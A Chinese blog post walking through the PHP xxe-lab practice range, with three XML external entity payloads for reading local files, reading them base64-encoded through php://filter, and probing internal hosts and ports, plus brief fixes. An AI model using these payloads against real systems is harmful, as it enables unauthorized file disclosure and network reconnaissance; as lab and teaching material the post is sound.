XXE-Lab for PHP

最新推荐文章于 2024-05-04 16:23:28 发布
最新推荐文章于 2024-05-04 16:23:28 发布
阅读量648 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: php 开发语言 服务器 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/132789109
版权

环境配置

1.将靶场进行下载....

https://github.com/c0ny1/xxe-lab

2.将PHPStudy的中间件与版本信息调制为php-5.4.45+Apache访问以下地址开始练习...

http://127.0.0.1/xxelabs/php_xxe/

靶场实操

1.在登录界面输入账号密码并抓取数据包....

2.尝试读取本地文件....

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "file:///d:/test.txt">]>
<user><username>&fl;</username><password>asdf</password></user>

3.使用PHP伪协议读取文件....

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">]>
<user><username>&fl;</username><password>asdf</password></user>

4.探测内网存活主机与端口...

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "http://127.0.0.1:80">]>
<user><username>&fl;</username><password>asdf</password></user>

漏洞修复

  1. 使用开发语言禁用外部实体;
  2. 过滤SYSTEM/PUBLIC等关键字;
  3. 升级 libxml 组件

魏钦6666
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[红日安全]Web安全Day8 - XXE实战攻防
hongrisec的博客
03-03 963
本文由红日安全成员: ruanruan 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pyt...
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 2978
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
PHP-XXE-Lab——漏洞利用
W小哥
12-22 1781
一、环境搭建 环境源码下载地址:https://github.com/c0ny1/xxe-lab 下载后,php_xxe放在网站根目录即可运行 二、漏洞利用 访问目标网站,如下图所示 输入用户名、密码后,使用burpsuite拦截数据包,仔细观察传输数据的部分,跟大多数传输数据方式不一样 大多数传递方式,是下面这两种 所以,如果在渗透测试过程中,发现POST数据传递方式是 adminpassword 则说明,网站是采用的XML语言接收的数据,此处可能存在XXE漏洞 接下来,利用XXE漏洞读取敏感文件
xxe漏洞案例1-xxe lab for php
最新发布
c0529的博客
05-04 792
xxe lab是一个小的网站靶场,我们可以用这个网站对于xxe漏洞进行一个大致的了解。
DTD学习一(入门)
Joy的专栏
04-04 575
一 简介 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 二、实例 1、如果一个DTD被包含在XML源文件中,如使用如下test.xml: 文档定义语法: 元素定义语法: 2、如果是一个XML文件引用一个外部的DTD文件,如下实例: te
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
XXE - How to become a Jedi
02-20
### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它发生在应用程序解析 XML 数据时,未能正确过滤外部实体引用的情况。当一个恶意构造的 XML 文档被传入到易受...
XML schema 编辑工具 xxe-perso-4_9_1
11-19
"xxe-perso-4_9_1"看起来是一款专门针对XML Schema编辑的工具,版本号为4.9.1。这类工具通常提供以下功能: 1. **XML Schema设计**:用户可以通过图形界面设计复杂的XML Schema,定义元素、属性、数据类型、约束等...
xxe-workshop:2019年巴黎Hack研讨会
04-15
XXE高级研讨会 该存储库包含在2019年巴黎Hack会议上介绍的所有测试应用程序。 阅读教程 教程: : 自己运行应用程序 所有应用程序代码和docker脚本都包含... git clone https://github.com/GoSecure/xxe-workshop.git
xss-lab通关之路
黑白的博客
10-12 4475
xss-lab通关之路
XXE漏洞(下)
errorr0
04-10 1027
XXE注入攻击
xss-labs-master靶场环境搭建与1-6关解题思路
weixin_50985113的博客
07-01 662
1、靶场地址 2、小皮面板 3、windows机器 4、把压缩包解压,放在www目录下,然后访问即可 直接输入就行: 使用上面的弹窗语句,发现被转义了 拿出函数后,发现双引号已经被注释成 发现双引号被转义后,我们尝试使用单引号绕过,但是.........
xxe-lab来深入学习xxe漏洞
aaeoj8957的博客
06-07 733
这几天,想复习一下xxe的知识,于是把以前的一个靶场拿过来玩玩,顺便审计一下代码2333,靶场地址:https://github.com/c0ny1/xxe-lab 首先先练习的是php-xxe: ...
XXE Lab渗透测试实战靶场
zhangpeng999123的博客
04-23 3087
任务描述:信息收集。 1. 首先查看kali机器IP地址: 10.1.1.91 2. 使用netdiscover扫描本地网络主机: # netdiscover -r 10.1.1.0/24 -r range:扫描给定范围而不是自动扫描。 3. 使用nmap扫描目标ip: # nmap -sV -p 1-65535 10.1.1.93 ...
XXE—实体注入、XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2029
XXE—实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
XXE Lab:1题解
weixin_34314962的博客
11-07 775
思路 题目已经提示是XXE的专项练习,所以,直接找XXE问题. 难度 入门 端口扫描 nmap -sS -A 10.129.10.64 发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件 80端口检查 其中,/xxe/index.php页面通过xml格式提交用户名和密码,于是,此处即为XXE所在位置。构造如下payload,读取页面源码,获得一不知是flag还...
边打XXE-lab边学习(一)
negnegil的博客
06-19 4778
一、简介及靶场搭建 简介 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 XXE原理 XXE即XML外部实体注入 。我们先分别理解一下注入和外部实体的含义。 注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。 外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。 所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值